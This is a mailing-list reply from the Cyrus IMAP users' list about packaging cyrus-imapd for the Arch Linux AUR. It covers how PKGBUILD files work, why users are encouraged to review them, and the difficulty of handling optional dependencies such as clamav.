On 3/13/19 11:49 AM, Jason Tibbitts wrote:
> In general I agree with you, but for a distro the issue
> generally comes down to dependencies.
>
> In Fedora, for example, we split the virus scanning portion out to a
> separate package, because otherwise cyrus-imapd ends up with a
> dependency on clamav. We want to avoid that because not everyone
> wants to maintain a clamav installation so we put the cyr_virusscan
> binary and its manpage in a separate subpackage.
Unfortunately that's not a model that works for the Arch Linux AUR.
Basically almost anyone can put out an AUR package (this is one of the
reasons nearly everything in the linux ecosystem is readily available on
Arch), but such packages are required to be text files only with
absolutely no exceptions allowed. Most of the heavy lifting is done by a
PKGBUILD file, which is essentially a fancy shell script which relies on
the makepkg utility for interpretation. The PKGBUILD orchestrates
downloading, configuring, and compiling software directly from upstream
sources into a binary pacman package (think of it as Gentoo, but just
for extra goodies and not the base system). In cases where only
binaries are available, the PKGBUILD can download binaries from the
official upstream source and convert them to an Arch package. Users are
encouraged to examine these PKGBUILD files in order to make sure no one
is attempting to install malware on their systems, but of course most
don't, and there have been a couple of cases of AUR packages which
attempted to sneak malware into the AUR. It's still a pretty good
bazaar with no actual examples of serious malware deployment to date.
Enough people do look at the PKGBUILD files, and most convenience
utilities (e.g. yay or pacaur) try and make you look at the PKGBUILD
even though they're doing the work for you.
Generally this system works amazingly well, but this is an example where
it breaks down. And yes, it's precisely the dependencies which are an
issue. I can list the packages found here:
https://www.cyrusimap.org/imap/developer/compiling.html
as optional dependencies, but down the road someone will attempt to use
a feature and likely won't run `pacman -Qi` to remind themselves of the
necessity of these optional dependencies for that feature. The
alternative, requiring the installation of all possible dependencies,
seems unreasonable as well.
The saving grace is perhaps that this is a package aimed at systems
administrators rather than ordinary users, and as such I might be able
to get away with setting up an Arch Wiki page explaining what all the
optional dependencies are.
----
Cyrus Home Page: http://www.cyrusimap.org/
List Archives/Info: http://lists.andrew.cmu.edu/pipermail/info-cyrus/
To Unsubscribe:
https://lists.andrew.cmu.edu/mailman/listinfo/info-cyrus